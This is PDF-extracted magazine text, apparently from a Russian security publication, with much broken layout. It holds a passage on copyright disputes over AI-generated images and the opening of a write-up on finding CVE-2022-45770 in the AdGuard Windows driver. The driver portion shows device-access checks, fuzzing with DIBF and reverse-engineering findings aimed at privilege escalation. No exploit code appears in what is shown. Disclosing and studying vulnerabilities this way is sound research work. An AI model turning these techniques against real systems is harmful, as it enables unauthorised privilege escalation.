некотором |
старании |
|
— весьма |
|
качествен |
ные |
изображения |
|||||||||||||||||||||||||
по заданным |
ключевым |
словам . Уже появилось |
поколение |
дизайнеров , боль |
||||||||||||||||||||||||||||||
шая часть работы которых — грамот но составить |
запрос на генерацию |
нужного |
||||||||||||||||||||||||||||||||
заказчику |
изображения . |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||
В результате |
часто |
получаются |
яркие, необычные , оригиналь |
ные |
картинки , |
|||||||||||||||||||||||||||||
непохожие |
на существу ющие |
арты. Отложим |
вопрос |
о техничес ком |
несовер |
|||||||||||||||||||||||||||||
шенстве и некоторой |
«корявости » изображений ; в конце концов , нейросетям |
|||||||||||||||||||||||||||||||||
без году неделя, у них всё впереди . Поговорим |
вот о чем: кому принад лежит |
|||||||||||||||||||||||||||||||||
результат работы искусствен |
ного |
интеллекта , можно ли его законно исполь |
||||||||||||||||||||||||||||||||
зовать в коммерчес ких целях и не нарушает ли это чьих либо прав? |
|
|
|
|
|
|||||||||||||||||||||||||||||
В качестве |
«сферичес кого |
ИИ в вакууме » рассмот |
рим |
|
продукт |
Stable |
||||||||||||||||||||||||||||
Difusion. Это некоммерчес кое решение с предель |
но |
щедрой |
|
лицен зией . Сог |
||||||||||||||||||||||||||||||
|
|
|
|
|
|
|||||||||||||||||||||||||||||
ласно этой лицензии |
созданные |
при помощи нейросети |
арты принад лежат |
|||||||||||||||||||||||||||||||
конечному |
пользовате лю , который сгенери ровал |
запрос . Казалось бы, что |
||||||||||||||||||||||||||||||||
может быть неоднознач ного |
|
в лицензии , которая предос тавля ет «perpetual, |
||||||||||||||||||||||||||||||||
worldwide, |
|
non-exclusive, |
no-charge, |
|
royalty-free, |
irrevocable |
|
copyright license |
to reproduce, prepare, publicly display, publicly perform, sublicense, and distribute the Complementary Material, the Model, and Derivatives of the Model»?
Однако такую неоднознач ность нашли . Первой ласточкой стала широко известная в узких кругах публикация в одной «экстре мист ской » социаль ной сети. Пользователь с подполь ной кличкой Eugene Arenhaus пишет:
«Последнее время некоторые мои френды активно постят продук цию Midjourney и прочих «генераторов изображений » на основе Stable
Diffusion. Видимо, мне придет ся писать подробный разбор этой тех- нологии. А пока прошу вас всех этого не делать — не репостить «ИИ нарисовал картинку » и не пользовать ся самим. Основание : факты показывают , что под видом «ИИ» нам втюхива ют нечто вроде фоторо- бота, в которого заложены более полумиллиар да исходных изоб- ражений, взятых из интернета без спросу и с нарушением огромного количества авторских прав и лицензион ных соглашений .
Каждый кусочек в любом «ИИ нарисовал » на деле нарисовал худож-
ник, которого обокрали разработ чики Stable Diffusion и составите ли » базы LAION-5B.
Вданном случае автор сообщения чрезмерно упрощает проблему . Изоб ражения, генерируемые диффузи онными нейросетя ми, не являются «кол лажем» или «фотороботом », а утвержде ние про то, что у «кусочков » работ ИИ
есть настоящие авторы , по меньшей мере спорное . И как раз такой спор открыт в виде судебного иска Stable Difusion litigation (в The Verge публиковал
ся подробный разбор ).
«Stable Diffusion относит ся к категории систем искусствен ного интеллек- та, называемых генератив ным ИИ. Эти системы обучают ся на опре-
деленном виде творческих работ — к примеру , на тексте , програм мном коде или изображени ях — и затем микширу ют эти работы для получе- ния («генерации ») других работ того же вида.
Скопиро вав пять миллиар дов изображений без согласия оригиналь - ных художников , Stable Diffusion использует математичес кий процесс , называемый диффузи ей, для хранения сжатых копий этих обучающих изображений , которые, в свою очередь , рекомбиниру ются для получе- ния других изображений . Иными словами , это инстру мент XXI века
для производс тва коллажей . |
|
|
|
|
|
|
|
|
|
|
|
|
|||||||
Получен ные |
изображения |
могут внешне напоминать |
или не напоми- |
|
|||||||||||||||
нать изображения |
, которые |
нейросеть |
использовала |
для обучения |
. |
|
|||||||||||||
Независимо |
от |
этого , сгенери рован ные |
изображения |
|
получены |
|
|||||||||||||
из копий |
обучающих |
изображений |
и конкуриру |
ют с ними |
на рынке . |
|
|||||||||||||
В лучшем |
случае |
способ ность |
Stable Diffusion |
наводнить |
рынок прак- |
» |
|||||||||||||
тически неограничен ным |
количеством |
контра фак тных |
изображений |
||||||||||||||||
|
|||||||||||||||||||
нанесет непоправимый |
ущерб рынку искусства и художников |
. |
|
|
|
Что мы видим из сути предъявленных претен зий ? Авторы иска признают , что сгенери рован ные нейросетью картинки могут получаться совершенно непохо жими на оригина лы , в то время как «существен ное сходство » всегда было классичес ким признаком , на который опирались судебные эксперты в попыт ках определить , является ли рассмат рива емая работа «производным » или «оригиналь ным » произве дени ем .
С точки зрения |
законов об авторском |
праве произве дения , основан ные |
|||||||||||||||||||||||||
на других работах, могут быть «производны |
ми произве дени ями ». Авторские |
||||||||||||||||||||||||||
права на такие произве дения |
определя ются |
законами США следующим |
обра |
||||||||||||||||||||||||
зом: «Производные |
работы могут быть созданы |
с разрешения |
владель |
ца |
|||||||||||||||||||||||
копирайта или из работ, которые являются |
всеобщим |
достоянием |
». |
|
|
|
|
|
|
||||||||||||||||||
Россий ское |
законодатель |
ство |
|
видит |
«производные |
произве дения » так: |
|||||||||||||||||||||
«Создавая |
произве дение , основан ное |
на производном |
, вы создаете |
новое, |
|||||||||||||||||||||||
защищенное |
авторским |
правом |
произве дение . В то же время права на ори |
||||||||||||||||||||||||
гинальный |
объект также остаются |
и никуда не пропада ют . Публиковать |
про |
||||||||||||||||||||||||
изводные произве дения |
можно с разрешения |
автора оригиналь |
ного |
произве |
|||||||||||||||||||||||
дения». |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Производное |
произве дение |
необязатель |
но должно |
точно повторять |
ори |
||||||||||||||||||||||
гинал, чтобы |
оно было признано |
именно |
«производным |
». Более того, в цир |
куляре Circular 14: Copyright in Derivative Works and Compilations (PDF) при
водятся такие примеры производных произве дений , как «скульпту ра , соз данная по рисунку », «рисунок, сделан ный по фотографии », «литографичес кий оттиск, основан ный на картине » (это довольно древний закон: под литографи ей в нем подразуме вают ся вовсе не принты на футболках ).
Основным критери ем «производно го произве дения » считает ся «сущес твенное сходство » (substantial similarity) между оригиналь ной и производной работами . Четкого определе ния «существен ного сходства » нет, однако сущес твует судебная процеду ра , позволя ющая определить его в каждом конкрет ном случае .
Таким образом , авторы иска жалуются не на то, что сгенери рован ные ИИ работы визуаль но похожи (имеют «существен ное сходство ») на работы живых художников , а на то, что защищенные законом об авторском праве изоб ражения использовались без разрешения правооб ладате лей в новом качестве : в качестве обучающе го материала . Грубо говоря, если суд станет на сторону истцов, сгенери рован ные нынешним поколением нейросетей картинки могут стать «нелицензион ными » со всеми вытекающи ми последс тви ями независимо от того, есть ли в них «существен ное сходство » с оригина лами или нет.
«Купание красного коня», Midjourney, по мотивам Кузьмы Петрова Вод кина
Так ли это на самом деле? Stable Difusion действи тель но берет для трениров ки «картинки из интернета » (надеюсь , мне не нужно объяснять , что случай но взятую «картинку из интернета » нельзя просто так использовать , например , в качестве обложки для книги ?). Для создания базы данных были привлечены миллионы изображений как из области публично го достояния (public domain), так и защищенных более или менее жестки ми лицензиями .
Лицен зии бывают разные : от практичес ки неограничен ных (можно исполь зовать как угодно без указания авторства оригина ла ) до чрезвычай но лимити рованных (разреша ются только оговорен ные в лицензии виды примене ния , причем исключитель но лицензиату ). В данном иске истцы утвержда ют , что ней росеть использовала для обучения «огромное число работ, защищенных авторским правом , без согласия , упомина ния и компенса ции [правооб ладате лям]».
Собствен но, вот мы и дошли до сути иска. В споре хозяйству ющих субъ ектов одна сторона (создатели моделей) хочет обучить искусствен ный интеллект на миллионах бесплат ных картинок , а авторы оригиналь ных изоб ражений, может быть, и не против , но хотели бы, чтобы им компенси ровали их труд или хотя бы отнеслись с должным уважени ем.
«Звездная ночь», Midjourney, по мотивам Винсента Ван Гога
Кто здесь прав? Признаюсь , я не знаю, и, пожалуй, не знает никто . Если будет решение суда (а его может и не быть, если стороны договорят ся во внесудеб ном порядке ), то будет создан прецедент , который может оказать серьезное влияние на законодатель ство , регулирующее создание «производных произве дений». А вот сам факт того, что был иницииро ван судебный процесс , я вос принимаю сугубо положитель но . Неожидан но ? Совсем нет, и вот почему.
ВЫХОД ИЗ СЕРОЙ ЗОНЫ
Сегод ня как сами диффузи онные нейросети , так и созданные ими изоб ражения находятся в своеоб разной серой зоне законов об авторском праве . Сейчас мы можем наблюдать момент зарождения нового явления , для регули рования которого пока что нет ни правовой основы , ни тем более правоп
рименитель |
ной |
практики . |
Вспомним |
интернет |
в начале |
своего |
развития |
|||||||||||
и вспомним |
|
«картинки |
из |
интернета », которые частень |
ко встречались |
|||||||||||||
на обложках книг, издаваемых |
вполне уважаемы |
ми издатель |
ства ми . |
|
||||||||||||||
В каком положении |
окажут ся диффузи онные |
нейросети |
завтра , через год, |
|||||||||||||||
через десять лет? Думаю, со временем |
статус нейросетей |
будет закреплен |
||||||||||||||||
законодатель |
но . А вот каким именно образом |
— пока неизвес тно . Может быть, |
||||||||||||||||
разработ |
чиков |
нейросетей |
обяжут использовать |
для обучения |
только работы |
из области всеобще го достояния . Быть может, в лицензию |
Creative Commons |
|||||||||||||||||||||||
добавится пункт, упомина ющий |
нейросети , в явном виде разреша ющий |
|||||||||||||||||||||||
или запреща ющий |
использование |
лицензион |
ных |
картинок |
для обучения |
ИИ. |
|
|||||||||||||||||
А может быть, создателей |
или операто ров ИИ заставят |
выплачивать |
роялти |
|||||||||||||||||||||
правооб ладате лям . Или не правооб ладате лям , а в некий вновь созданный |
кол |
|||||||||||||||||||||||
лективный |
орган |
управления |
авторски ми |
правами |
(нервно |
оглядыва емся |
||||||||||||||||||
на Михалкова ). Когда это произой дет , бизнесы |
вздохнут с облегчением |
: вмес |
||||||||||||||||||||||
то бесплат |
ных |
картинок |
с непонятными |
(и оттого страшными ) юридичес кими |
||||||||||||||||||||
последс тви ями |
они получат доступ к очень дешевым сгенери рован |
ным |
изоб |
|||||||||||||||||||||
ражениям , которые можно будет безбояз ненно |
использовать |
в коммерчес ких |
||||||||||||||||||||||
целях. |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
А что художники , авторы оригиналь |
ных |
изображений , |
на которых трениру |
|
ются нейросети ? Полагаю, они окажут ся в той же ситуации , в которой ока зались профес сиональные фотографы после появления фотобанков (спойлер : они не вымерли ).
Через несколь ко дней после публикации статьи на создателей Stable Difusion подал в суд один из крупней ших фотобанков Getty Images. Суть претен зии —
внарушении авторских прав компании на этапе обучения нейросети .
Вотличие от коллектив ного иска, который мы подробно разобрали в статье, шансы Getty Images оценива ются юристами гораздо выше, но даже в этом слу чае большинс тво участни ков соглаша ется, что результат процес са может быть
неожидан ным . Добавим сюда такой прецедент |
: в Getty ранее уже лицен |
|||||||||||||||||||||||
зировали |
изображения |
|
разработ |
чикам |
|
других |
нейросетей , а разработ |
чики |
||||||||||||||||
Stable Difusion решили не платить |
за использование |
тех же изображений |
||||||||||||||||||||||
и метаданных . |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||
Андрес |
Гуадамаз |
специали зиру |
ется |
на искусствен |
ном |
интеллекте и автор |
||||||||||||||||||
ском праве . По его словам , иск Getty «имеет серьезные |
шансы на успех». «Иск |
|||||||||||||||||||||||
Getty сформулиро ван |
гораздо точнее |
|
[предыду |
щего ] коллектив ного |
иска. |
|||||||||||||||||||
Дело, скорее |
всего , будет основывать |
ся на иске о нарушении |
авторских |
прав, |
||||||||||||||||||||
а ответчики , вероятно , будут настаивать |
на позиции "добросовес тно го исполь |
|||||||||||||||||||||||
зования". Непонятно , что получится в итоге .» |
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||
Аарон Мосс, юрист по авторско му праву в Greenberg Glusker и издатель |
||||||||||||||||||||||||
блога Copyright Lately, согласен |
, что новый иск сформулиро ван |
удачнее |
упо |
|||||||||||||||||||||
мянутого |
коллектив ного |
иска. «Иск сфокуси рован |
|
ровно так, как нужно : |
||||||||||||||||||||
на входном |
этапе , принима ющем |
для обучения |
нейросети |
изображения , |
||||||||||||||||||||
защищенные |
авторским |
|
правом . Это будет захватыва ющая |
битва за право |
||||||||||||||||||||
добросовес тно го использования ». |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
ПАРА СЛОВ О «ПРЕЗУМПЦИИ НЕВИНОВНОСТИ»
В сети уже сломано немало копий по поводу «суда над искусствен ным интеллектом ». Наиболее прогрессив ные (сарказм !) участни ки дискуссий даже использовали слова «презум пция невиновности ». Уточню : поданный в аме риканский суд иск не имеет отношения к уголов ному праву , в котором дей ствует презум пция невиновности с требова нием доказатель ств «при отсутс твии обоснован ного сомнения » (beyond reasonable doubt). В рамках граждан ского процес са истцу достаточ но доказать «небрежение » ответчика с 51-про центной степенью достовер ности . В россий ском же граждан ском праве и вов се действу ет «презум пция вины», в рамках которой нарушитель считает ся виновным до тех пор, пока не докажет свою невиновность .
«Поцелуй», Midjourney, по мотивам Густава Климта
К СЛОВУ, О ФОТОГРАФИЯХ |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||
Изображения , которые генерирует |
нейросеть |
, — это результат работы вычис |
||||||||||||||||||||||||||||||||||||
лительной |
техники |
и алгорит мов |
(совсем |
как в современ |
ной |
цифровой |
фотог |
|||||||||||||||||||||||||||||||
рафии), а роль пользовате ля , который подбира ет нужные |
ключевые |
слова , |
||||||||||||||||||||||||||||||||||||
чем то напоминает |
работу фотографа . Каким образом |
законы об авторском |
||||||||||||||||||||||||||||||||||||
праве защищают фотографии ? |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|||||||||||||||
В этой области «голливуд |
ское |
право » (то, как обыватель |
представ ляет |
себе |
||||||||||||||||||||||||||||||||||
работу правоох ранитель |
ных |
органов |
по соответс тву ющим |
фильмам ) учит нас |
||||||||||||||||||||||||||||||||||
тому, что автором |
каждой |
фотографии |
считает ся человек, который нажал |
|||||||||||||||||||||||||||||||||||
на кнопку , а его авторские |
права защищаются ... защищаются ... а как они, собс |
|||||||||||||||||||||||||||||||||||||
твенно , защищаются ? |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
||||||||
За подробнос тями |
отправлю |
к статье «Правовые |
|
режимы |
фотографии |
|||||||||||||||||||||||||||||||||
|
|
|
|
|
|
|
||||||||||||||||||||||||||||||||
в россий ском |
праве », опубликован |
ной |
в июне 2021 года в журнале |
Суда |
||||||||||||||||||||||||||||||||||
по интеллектуаль |
ным |
|
правам . Если в двух словах , то всё несколь |
ко сложнее , |
||||||||||||||||||||||||||||||||||
чем можно понять из голливуд |
ских |
боевиков . Так, из статьи по ссылке мы узна |
||||||||||||||||||||||||||||||||||||
ем, что герман ское |
право отделяет |
фотографичес кие |
|
произве дения |
(нем. |
|||||||||||||||||||||||||||||||||
Lichtbildwerk), |
на |
|
которые |
|
распростра няет |
ся |
|
авторско правовой |
|
режим, |
||||||||||||||||||||||||||||
от «простых » фотографий |
(нем. Lichtbild), являющих ся объектом |
смежных прав. |
||||||||||||||||||||||||||||||||||||
При этом закон не устанав лива ет четких критери ев для отнесения |
фотоизоб |
|||||||||||||||||||||||||||||||||||||
ражения к той или иной категории , упоминая |
лишь, |
|
|
что произве дени ем , |
||||||||||||||||||||||||||||||||||
по смыслу закона, считает ся только личное интеллектуаль |
ное творение . |
|
|
|||||||||||||||||||||||||||||||||||
Принятый |
в Германии |
подход соответс тву ет подходу |
Евросоюза , в котором |
|||||||||||||||||||||||||||||||||||
авторско правовая |
|
охрана предос тавля ется |
не просто эстетичес ким |
фотог |
||||||||||||||||||||||||||||||||||
рафиям , но только тем из них, которые отражают |
личность |
автора . |
|
|
|
|
|
|||||||||||||||||||||||||||||||
Несколь |
ко отличает ся от принципов |
«голливуд |
ско го права », |
не так ли? |
||||||||||||||||||||||||||||||||||
А ведь есть еще довольно близкие |
к нашей сегодняшней |
теме «фотоизоб |
||||||||||||||||||||||||||||||||||||
ражения, создава емые |
|
|
с |
помощью дополнитель |
ных |
приложе ний |
и прог |
|||||||||||||||||||||||||||||||
рамм» — для них нет четко прописан |
ных законов, но есть мнения : |
|
|
|
|
|
«...используя графичес кий редактор , автор создает новое изображение , которое является оригиналь ным, то есть отражающим индивиду аль-
ность создавше го его лица. И следует обратить внимание на сле- дующий момент: если основой такого фотопроиз ведения стало другое
оригиналь ное фото, есть все основания говорить о создании про- изводного произве дения (п. 1 ст. 1260 ГК РФ), что налагает на автора производно го произве дения обязан ность получения согласия » на использование первоначаль ного произве дения.
Также определе ны «фотографии , создава емые без участия субъекта права », создава емые в автомати чес ком режиме или получаемые случай ным образом под влиянием каких либо внешних факторов — например , камера среаги рова ла на животное , появившееся в кадре . Автор статьи пишет:
«Посколь ку субъектом авторско го права может быть только физическое лицо, в случае если фотография была сделана животным , авторские
права на нее не возника ют (в том числе ни у владель ца фотоаппа рата, ни у хозяина животного ) — по сложив шемуся мнению , полученную » фотографию следует рассмат ривать как обществен ное достояние .
Похоже го мнения придер жива ется и Андрей Васин, партнер , патентный поверенный , «Стэндмарк », согласив ший ся проком менти ровать нашу статью.
Можно ли назвать создава емое ИИ изображение «произве дени ем »? С точки зрения россий ско го законодатель ства — нет, так как автором произве дения науки, литературы или искусства признает ся гражданин , творческим трудом которого оно создано (ст. 1257 ГК РФ), и именно автору , как физическому лицу, изначаль но принад лежит исключитель ное право на произве дение , право авторства и другие права в соответс твии со ст. 1255 ГК РФ.
Я также считаю , что пользователь , который сгенери ровал запрос , не явля ется правооб ладате лем (автором ) получившегося в результате такого запроса изображения , так как объект все таки создает не он, а нейросеть . В против ном случае пользователь , сформировав ший определен ный запрос в каком либо поисковом сервисе , может претен довать на исключитель ные права на полученные результаты такого запроса . Следующая сложность заключа ется в квалифи кации процес са обучения ИИ. Если считать создание изображений
переработ кой произве дений, защищенных авторским правом , то как опре делить, какое из миллиар дов изображений было переработа но и в какой части оно было воспро изведено в итоговом изображении ? Если считать , что процесс обучения ИИ сходен с процес сом развития интеллекта человека , то получа ется, что нейросеть учится технике создания изображений , и в этом случае вопрос с переработ кой отпадает сам собой.
При текущих обстоятель ствах я считаю , что созданные художествен ной ней росетью изображения являются свобод ными для использования любым лицом в любых целях. Независимо от этого , за автором и иным правооб ладате лем сохраня ется возможность защиты своих прав, если в каком либо созданном нейросетью изображении он узнает свое произве дение .
— Андрей Васин, партнер , патентный поверенный , «Стэндмарк »
ВЫВОДЫ
Я с большим интересом наблюдаю за иском против разработ чиков систем диффузи онных нейросетей . Думаю, как и многим , мне хотелось бы получить инстру мент для генерации лицензион но чистых изображений . Определить сте пень и условия «лицензион ности » и должен прецедент , который может быть создан по результатам судебного процес са .
|
|
|
hang |
e |
|
|
|
|
||
|
|
C |
|
|
E |
|
|
|||
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
|
d |
|
|
|
F |
|
|
|
|
|
|
|
t |
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
wClick |
|
c |
|
o m |
COVERSTORY |
||||
|
|
|
|
|
|
|||||
|
|
|
to |
BUY |
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
.c |
|
||
|
. |
|
|
|
|
|
|
|
||
|
p |
|
|
|
|
|
g |
|
|
|
|
|
df |
-x |
|
n |
e |
|
|||
|
|
|
ha |
|
|
|
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
c |
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x ha |
|
|
|
|
ИЩЕМ И ЭКСПЛУАТИРУЕМ УЯЗВИМОСТЬ В ДРАЙВЕРЕ
ADGUARD ДЛЯ WINDOWS
В этой статье я расска жу, как нашел бинарный баг в драйвере AdGuard. Уяз вимость получила номер CVE-2022-45770. Я покажу, как изучал блокиров щик рек ламы и раскру тил уязвимость до локаль ного повышения привиле гий. По дороге поизучаем низкоуров невое устройство
Windows.
Марсель Шагиев matador.garta@gmail.com
За консуль тацию в процес се исследова ния спа
сибо @Denis_Skvortcov. В его блоге крутые статьи на тему эксплу ата ции уязвимос тей
в антивиру сах для Windows. Сейчас взгляд Дениса пал на Avast.
|
Статья имеет ознакоми |
тель ный |
характер и пред |
|||||||||||
|
назначена |
для |
специалис |
тов |
по безопасности |
, |
||||||||
|
проводя |
щих |
тестирова |
ние |
в рамках |
контрак та . |
||||||||
|
Автор и |
редакция |
не несут |
|
ответствен ности |
|||||||||
|
за любой вред, причинен ный |
с примене нием |
||||||||||||
|
изложен ной |
информации . Распростра |
нение |
вре |
||||||||||
|
доносных |
программ , нарушение |
работы систем |
|||||||||||
|
и нарушение |
тайны |
переписки преследу |
ются |
||||||||||
|
по закону. |
|
|
|
|
|
|
|
|
|
|
|
|
КАК ВСЕ НАЧИНАЛОСЬ
Я мало что понимал в виндовых драйверах до того, как прочитал книгу Павла Йосифови ча Windows Kernel Programming. В книге все начинается с простого драйвера в духе Hello World и заканчива ется сложным драйвером фильтром . Также расска зыва ется про отладку драйверов в виртуаль ной машине с WinDbg на хосте и про типичные ошибки программи рова ния драйверов . После проч тения, конечно же, хочется применить знания на практике и разобрать какой нибудь драйвер . Может, нам повезет и мы найдем уязвимость ?
Статья рассчи тана на тех, кто немного разбира ется в реверс инжинирин ге сишного кода. В ней не будет подробно го разбора процес са реверса . За более детальным описани ем реверса обра тись к моей первой статье «Разборки на куче. Эксплу ати руем хип уязвимого SOAP-сервера
на Linux».
ПОЧЕМУ ADGUARD
AdGuard — классный блокиров щик рекламы , поддержи вающий шифрован ный DNS (DoH, DoT, DoQ). Чтобы блокиро вать рекламные запросы всех приложе ний, а не только браузе ра, использует ся WDM-драйвер . Давай установим AdGuard на Windows 10 в виртуаль ной машине и начнем его изучать .
Так получилось , что я установил сборку для x86, поэтому исследовать мы будем 32-битный драйвер .
ПОВЕРХНОСТЬ АТАКИ
Первым делом нужно убедить ся , что драйвер находится на поверхнос ти атаки . То есть непривиле гиро ван ное приложе ние может открыть драйвер для вза имодей ствия — чтения , записи и отправки IOCTL. В этом нам поможет пара строк на PowerShell с библиоте кой NtObjectManager за авторством Джеймса Форшоу .
Для определе ния артефак тов (файлов , ключей реестра ) исследуемо го про
дукта прекрасно подходит утилита от Microsoft Attack Surface Analyzer. С ее помощью нужно собрать два снапшота ОС: до установ ки исследуемой прог раммы и после , а также создать дифф, который покажет установ ленные арте факты . Таким образом можно определить путь девайса в Object-Manager:
\Device\CtrlSM_Protected2adgnetworkwfpdrv
Ошибка при открытии девайса драйвера
Драйвер открыть не получилось . Ошибка 0xC000010
STATUS_INVALID_DEVICE_REQUEST, и это не 0xC0000022 ACCESS_DENIED! Зна
чит, доступ к девайсу драйвера у нас есть, но драйверу что то не понравилось в нашем запросе . Такое странное поведение — отличный повод приступить
к реверсу . Давай откроем драйвер в IDA и посмотрим на несколь ко важных мест.
Первое место — инициали зиру ющий код драйвера в функции DriverEntry.
Функция создания девайса драйвера
Функция IoCreateDevice() потенциаль но небезопас на , так как не позволя ет явно указать DACL. Таким образом , DACL берется либо из .INF-файла , либо из DACL-треда или процес са , который его создает . Также отметим , что девайс создает ся с неэксклю зив ным доступом (EXCLUSIVE_FALSE).
Рекомен дует ся использовать
IoCreateDeviceSecure(), куда можно явно передать DACL.
Аргумент FILE_DEVICE_SECURE_OPEN присутс тву ет . Если бы его не было, то было бы можно обойти строгий DACL, открыв произволь ный файл на этом девайсе . Смотрим дальше .
Флаг DO_DIRECT_IO говорит о том, что usermode-буферы для вызовов WriteFile() и ReadFile() будут мапиться в пространс тво ядра и у нас есть возможнос ти для атаки TOCTOU в случае double fetch в коде драйвера . Если бы на месте этого флага был METHOD_NEITHER, было бы еще интерес нее .
Здесь тоже все нормаль но, двигаем ся дальше .
Второе место — функция — обработ чик открытия девайса драйвера . Найти ее просто . В коде инициали зации драйвера необходимо явно назначить обра
ботчики функций OpenFile(), WriteFile() и ReadFile().
Обработ чики usermode-запросов в коде драйвера
На скриншотах IDA ты видишь названия переменных и функций , придуман ных мной во время реверса . Конечно же, символа от бинаря нам никто не даст.
Флаг DO_DIRECT_IO влияет на метод передачи данных из юзермода в ядро только для FileRead() и FileWrite(). Для DeviceIoControl() метод зашит в код IOCTL. Для быстро го просмотра метода можешь использовать ресурс osronline.com.
Без труда находим обработ чик открытия девайса .
|
|
|
Обработ |
чик IRP_MJ_CREATE |
|
|
|
|||||
Здесь реализован |
кастомный |
эксклю зив ный |
доступ к драйверу |
— PID открыв |
||||||||
шего его процес са сохраня ется |
в глобаль |
ную |
переменную |
hasOwner. Сле |
||||||||
дующая |
попытка |
открыть |
драйвер |
возвра щает |
ошибку |
STATUS_INVALID_REQUEST.
И что это за PID? Кто открыл драйвер раньше всех? Это сервисный процесс AdguardSvc.exe. Можем ли мы на него воздей ствовать? На удивление — да. Убить его через Terminate() нам не хватит прав, но у UI-процес са AdguardUI. exe есть кнопка «Выключить защиту».
Диало говое окно отключения AdGuard
Когда процесс AdguardSvc.exe закроет ся, снова попробу ем открыть девайс драйвера .
Get-NtFile() с теми же аргумен тами возвра щает другой результат
Получа ем права на чтение , запись и отправку IOCTL от непривиле гированного пользовате ля. Отлично! Поверхность атаки определе на.
На данном этапе исследова ния можно отметить две ошибки .
1.Своя реализация эксклю зивного доступа к драйверу вместо нужных аргу
ментов в IoCreateDevice(EXCLUSIVE_TRUE). Некритич но.
2.Архитек турно задумано так, что сервисный привиле гированный процесс эксклю зивно открывает девайс. Тогда было бы логично повесить на девайс соответс твующий DACL, а по факту доступ имеют все. Критич но, так как это сломало бы весь attack chain.
Иссле дование можно было заканчивать после неудачной попытки открыть девайс драйвера , но мы вниматель но отнеслись к коду ошибки и получили первую зацепку .
Кстати , проверить DACL девайса ты можешь и с помощью такой команды :
icacls.exe \\.\Device\<name>
Либо :
accesschk.exe -l \\.\GLOBALROOT\Device\<name>
В дизассем блер ном листинге мы заметили большое количество обработ чиков IOCTL. Что можно сделать вместо того, чтобы реверсить каждый ?
ФАЗЗИНГ
Фаззинг драйверов несколь ко сложнее фаззинга юзермодных приложе ний , потому что работа происхо дит не с виртуаль ным пространс твом единствен ного процес са , а со всей ОС целиком. Отсюда усложнение инфраструктуры — установ ка агента в виртуаль ную машину и запуск ее в QEMU/KVM, как, нап ример, в фаззере kAFL.
Но давай не будем плодить сущности сверх необходимо го и найдем что нибудь попроще , а если не сработа ет простой вариант , то уже тогда нач нем фаршировать инфраструктуру агентами и виртуали заци ей . Этот простой вариант — фаззер Dynamic Ioctl Brute-Forcer (DIBF). Он просто отправляет ран
домные IOCTL из юзермода в драйвер . Без хитрых мутаций, без сбора пок рытия, без сохранения стектрей са .
Подготовка
Восполь зуем ся двумя фичами Windows, которые улучшат качество фаззинга . Во первых , включим дополнитель ные провер ки для исследуемо го драй
вера через утилиту Driver Verifer. Это нужно , чтобы повысить вероятность нахождения бага.
Во вторых , попросим Windows собирать более полный дамп памяти в случае падения с BSOD. Это поможет нам в анализе крашей .
DIBF
DIBF запускаем вот такой командой :
dibf.exe \\.\CtrlSM_Protected2adgnetworkwfpdrv
Без аргумен тов DIBF брутфорсит коды IOCTL и так же брутфорсом определя ет размеры входных буферов для IOCTL. В результате первого запуска создает ся файл dibf-bf-results.txt.
$ type dibf-bf-results.txt
\\.\CtrlSM_Protected2adgnetworkwfpdrv
22019c 0 2000 <--- IOCTL, min buffer size, max buffer size
22019d 0 2000
...
Вторым запуском DIBF читает из файла IOCTL, и начинается фаззинг . Ждем пятнадцать минут и видим результат . Это тот редкий случай , когда BSOD вызывает радость! Падение произош ло в исследуемом драйвере .
Спасибо Оккаму и его бритве за фаззинг без сверхне обходимых сущностей . Проана лизируем результаты . Откроем в WinDbg файл MEMORY.DMP, который Windows собрала при падении, выполним команду analyze -v и посмотрим
на стектрейс .
Стектрейс при падении ОС
В WinDbg имеем снапшот оператив ной памяти на момент падения. Вытаскива ем из него базовый адрес модуля adgnetworkwfpdrv.sys и уже точечно начинаем смотреть , что же произош ло .
РЕВЕРС ДРАЙВЕРА
Вот функция , в которой случилось падение.
Место BSOD
Видно , что происхо дит обход какого то списка в цикле while. Чтобы не рас тягивать статью, я сразу расска жу про результаты реверса и покажу данные , с которыми работает драйвер .
Итак, драйвер создает paged pool область памяти с тегом FLT3. Там содер жится список указате лей на хеды singly-linked-списков .
Условное разделение адресного пространс тва на юзермод и кернелмод . FLT3 находится в кернелмо де
В глобаль ной переменной g_AdgItemsCounter хранит ся количество структур AdgItem (о них позже ). Нам доступен IOCTL, который добавляет элемент в список , — ADG_INSERT_ITEM.
Память ядра после вызова IOCTL ADG_INSERT_ITEM
В AdgItem.index записывает ся текущее значение g_AdgItemsCounter, оно же и возвра щается в ответе .
Размер списка — 0xBCB. Если добавить в него элемент номер 0xBCC или больше , то в список они будут добавлять ся как бы следующим уровнем .
Память ядра после многок ратно го вызова IOCTL ADG_INSERT_ITEM
